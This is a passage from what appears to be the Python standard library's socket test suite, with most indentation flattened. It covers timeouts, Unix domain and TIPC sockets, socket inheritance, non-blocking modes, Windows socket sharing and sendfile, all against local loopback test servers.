# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
        # create_connection() enumerates through all the addresses returned
        # and if it doesn't successfully connect to any of them, it
        # propagates the last exception it encountered (see the simplified
        # sketch after this test class).
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except TimeoutError:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('TimeoutError not raised')
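# Illustrative sketch, not part of the test suite, referenced from
# test_create_connection() above: a simplified model of how
# socket.create_connection() walks the getaddrinfo() results, returning the
# first address that connects and re-raising the last error if they all fail.
# A sketch of the documented behaviour, not the stdlib implementation.
def _create_connection_sketch(host, port, timeout=None):
    last_exc = None
    for family, type_, proto, _canonname, sockaddr in socket.getaddrinfo(
            host, port, 0, socket.SOCK_STREAM):
        sock = None
        try:
            sock = socket.socket(family, type_, proto)
            if timeout is not None:
                sock.settimeout(timeout)
            sock.connect(sockaddr)
            return sock
        except OSError as exc:
            last_exc = exc
            if sock is not None:
                sock.close()
    if last_exc is not None:
        raise last_exc
    raise OSError("getaddrinfo returned an empty list")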
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(TimeoutError, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no correct signal handling')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
self.assertIs(socket.error, OSError)
self.assertIs(socket.timeout, TimeoutError)
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS does not implement socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(os_helper.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if os_helper.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(os_helper.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules", encoding="utf-8")
except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory, or if we
        # don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipIf(sys.platform == 'OpenVMS', "OpenVMS has invalid F_SETFD implementation for sockets")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
                # timeout == 0 means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
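# Illustrative sketch, not part of the test suite: the three modes that
# checkNonblock() above distinguishes.  gettimeout() is None for a blocking
# socket, 0.0 for a non-blocking one, and > 0 when a timeout is set; in the
# timeout case the socket still reports getblocking() == True even though the
# underlying descriptor is kept non-blocking internally.
def _blocking_modes_sketch():
    with socket.socket() as s:
        s.setblocking(True)         # blocking mode
        assert s.gettimeout() is None and s.getblocking()
        s.setblocking(False)        # non-blocking mode
        assert s.gettimeout() == 0.0 and not s.getblocking()
        s.settimeout(2.0)           # timeout mode
        assert s.gettimeout() == 2.0 and s.getblocking()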
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # socket sharing is expected to work only for blocking sockets
        # since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(os_helper.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(os_helper.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
os_helper.unlink(os_helper.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = os_helper.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(os_helper.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
    # non-blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(os_helper.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(TimeoutError, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
